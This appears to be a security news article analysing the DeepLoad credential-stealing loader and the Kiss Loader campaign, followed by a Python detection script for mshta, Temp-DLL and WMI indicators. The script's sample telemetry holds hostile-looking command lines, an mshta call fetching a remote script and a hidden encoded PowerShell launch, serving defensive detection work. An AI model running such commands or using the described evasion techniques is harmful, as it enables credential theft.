DeepLoad: the loader hidden in Windows that steals credentials and evades detection

Published | 6 min read | 198 reads

In recent months a campaign has emerged that combines ingenious social engineering with advanced stealth techniques to spread a new malware loader named DeepLoad. What makes it particularly worrying is not only its intrusion capability, but the deliberate way it tries to blend in among legitimate Windows processes and avoid both static analysis and many common security controls, according to the researchers who have documented the threat.

The point of entry is not a sophisticated exploit but a psychological trap: a variant of the lure known as "ClickFix," which persuades the victim to paste and execute a command in the Windows Run box under the pretext of fixing an alleged problem that does not exist. This command invokes mshta.exe, a legitimate system utility, which downloads and runs an obfuscated PowerShell script. The use of mshta to run payloads has been described by analysts as an example of "Signed Binary Proxy Execution," a technique that abuses trusted system binaries to run malicious code (MITRE ATT&CK: mshta). To understand how mshta works on Windows, see the official Microsoft documentation (mshta, Microsoft Docs).


Once running, the loader shows a calculated pattern of evasion: its code is deliberately padded with meaningless assignments and names to hide the real logic and confuse static signatures. The analysts who investigated the sample believe that the attackers relied on artificial intelligence tools to generate that obfuscation layer, a trend that is gaining strength in the malware scene because it produces "noisy" and variable code with little human effort. DeepLoad also avoids leaving easily detectable traces, using techniques such as disabling PowerShell's command history and, instead of invoking standard cmdlets, calling Windows native functions directly to create processes and manipulate memory, which sidesteps many sensors that monitor PowerShell activity.

The loader also uses tricks so that its binary can be confused with legitimate system components: it embeds the payload in an executable whose name evokes the Windows lock-screen manager, and builds a second piece dynamically using PowerShell's Add-Type capability to compile and run C# code in memory. That operation produces a temporary DLL written to the Temp folder with a different name on each run, making detection based on signatures or repeated file names difficult. The Add-Type documentation in PowerShell is a good reference for understanding how this functionality is used (Add-Type, Microsoft Docs).

In the main payload execution phase, DeepLoad uses Asynchronous Procedure Call (APC) injection, a way to run code inside trusted processes. The routine is to launch a target process in a suspended state, write shellcode directly into its memory and resume it, thus avoiding leaving a decoded executable on disk. Process injection techniques such as this fall under the categories MITRE describes as "Process Injection" (MITRE ATT&CK: Process Injection), and their use reduces visibility for traditional controls that look for files or typical PowerShell calls.

The functional goal of the malware is not only to persist: it is aimed at credential exfiltration. It extracts passwords stored in browsers and drops a malicious extension that captures credentials in real time when users fill in login forms, and it stays resident between sessions. It also incorporates a removable-media propagation mechanism that copies shortcuts with attractive names, for example shortcuts that imitate browser installers or remote support tools, to induce execution when another user double-clicks the file on a different machine.

Silent persistence is another point worth highlighting: DeepLoad makes use of Windows Management Instrumentation (WMI) to re-inject itself into systems that seemed "clean" days later, without further interaction from the attacker. WMI allows the creation of event subscriptions that trigger later execution of the malicious code and, incidentally, break the parent-child process chains that many detection rules track, making it difficult to follow the classic trail of malicious activity (MITRE ATT&CK: WMI).

The picture that emerges from all these techniques is that of a multi-purpose loader designed to operate stealthily, move quickly and provide the attackers with credential theft, lateral movement and remote execution, all while reducing the detection surface by avoiding obvious artifacts on disk and blending in with system processes.

While the research on DeepLoad was being made public, another security firm described a parallel campaign that reuses Internet shortcuts (.url files) as an initial vector. In that case, a loader called Kiss Loader was being distributed through phishing emails linking to WebDAV resources on domains hosted by TryCloudflare. The initial shortcut downloads another shortcut disguised as a PDF; when it is run, it launches a WSH script that runs JavaScript, then a batch file that shows a PDF decoy, sets persistence in the Startup folder and downloads a loader written in Python. This loader finally decodes and runs a RAT variant (Venom/AsyncRAT), also using APC for injection. The security firm behind the report provided details of this process and its delivery and persistence stages.


These incidents highlight a number of lessons for defenders and security managers. On the one hand, the growing sophistication of obfuscation, probably assisted by AI tools, undermines solutions based exclusively on static signatures. On the other hand, the abuse of legitimate Windows utilities and mechanisms such as WMI or mshta underlines the importance of combining preventive controls with advanced telemetry that detects anomalous behavior and correlates signals over time. Attention to WMI subscriptions, execution from temporary locations, the appearance of unusual child processes and monitoring of DLL creation or memory injection are elements that should be prioritized in detection policies.
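As an added illustration of those detection priorities (not code from the original article or from the researchers who analyzed DeepLoad), the following Python correlator runs four rules over a handful of constructed, Sysmon-style event records: mshta.exe launched with a URL on its command line, PowerShell spawned by mshta.exe, PowerShell writing a DLL into a Temp folder (the Add-Type pattern), and WMI subscription registration (Sysmon event IDs 19/20/21). The event records and paths are made up for the example.

```python
"""Toy correlator for the DeepLoad-style behaviours described above.
EVENTS is constructed sample telemetry in a Sysmon-like shape, not real logs."""
import re

# Sysmon event IDs used: 1 = process create, 11 = file create,
# 19/20/21 = WMI filter / consumer / binding registered.
EVENTS = [
    (1, {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
         "cmdline": "mshta.exe http://example.invalid/fix"}),
    (1, {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "parent": r"C:\Windows\System32\mshta.exe", "cmdline": "powershell -w hidden -e ..."}),
    (11, {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "target": r"C:\Users\u\AppData\Local\Temp\abcd1234.dll"}),
    (20, {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "name": "Updater", "type": "CommandLine"}),
    (1, {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
         "cmdline": "notepad"}),  # benign control record, should not fire
]

# A DLL whose parent directory is named Temp (constructed indicator of Add-Type compiles)
TEMP_DLL = re.compile(r"\\Temp\\[^\\]+\.dll$", re.IGNORECASE)


def exe(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) hits, one rule per indicator named in the article."""
    hits = []
    for eid, f in events:
        if eid == 1 and exe(f["image"]) == "mshta.exe" and re.search(r"https?://", f["cmdline"], re.I):
            hits.append(("mshta-remote-hta", f["cmdline"]))
        if eid == 1 and exe(f["parent"]) == "mshta.exe" and exe(f["image"]) == "powershell.exe":
            hits.append(("mshta-spawns-powershell", f["cmdline"]))
        if eid == 11 and exe(f["image"]) == "powershell.exe" and TEMP_DLL.search(f["target"]):
            hits.append(("powershell-writes-temp-dll", f["target"]))
        if eid in (19, 20, 21):
            hits.append(("wmi-subscription-registered", f.get("name", "")))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

In a real deployment the same rules would be expressed in the SIEM's query language and fed by Sysmon or EDR telemetry; the point here is that each indicator in the paragraph maps to a concrete, testable condition.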

For those who want to go deeper into the reports and technical analyses, it is useful to review the documentation and reports published by the analysis companies that have investigated these cases. ReliaQuest's corporate page and specialized media have collected the findings on DeepLoad, while firms like G DATA have documented Kiss Loader and its delivery chain. For general reference on the techniques used, consult consolidated resources such as MITRE ATT&CK and Microsoft's official documentation on the tools and APIs involved (ReliaQuest, The Hacker News, G DATA, MITRE ATT&CK, Microsoft Docs).

The conclusion for security managers and users is clear: it is not enough to rely on file- and signature-based blocking. Effective defense must incorporate behavioral controls, privilege segmentation, restrictions on system utilities launched from unexpected contexts and continuous user education to resist social engineering traps. The threat landscape is becoming more dynamic and automated; adapting to that reality is no longer optional, it is urgent.
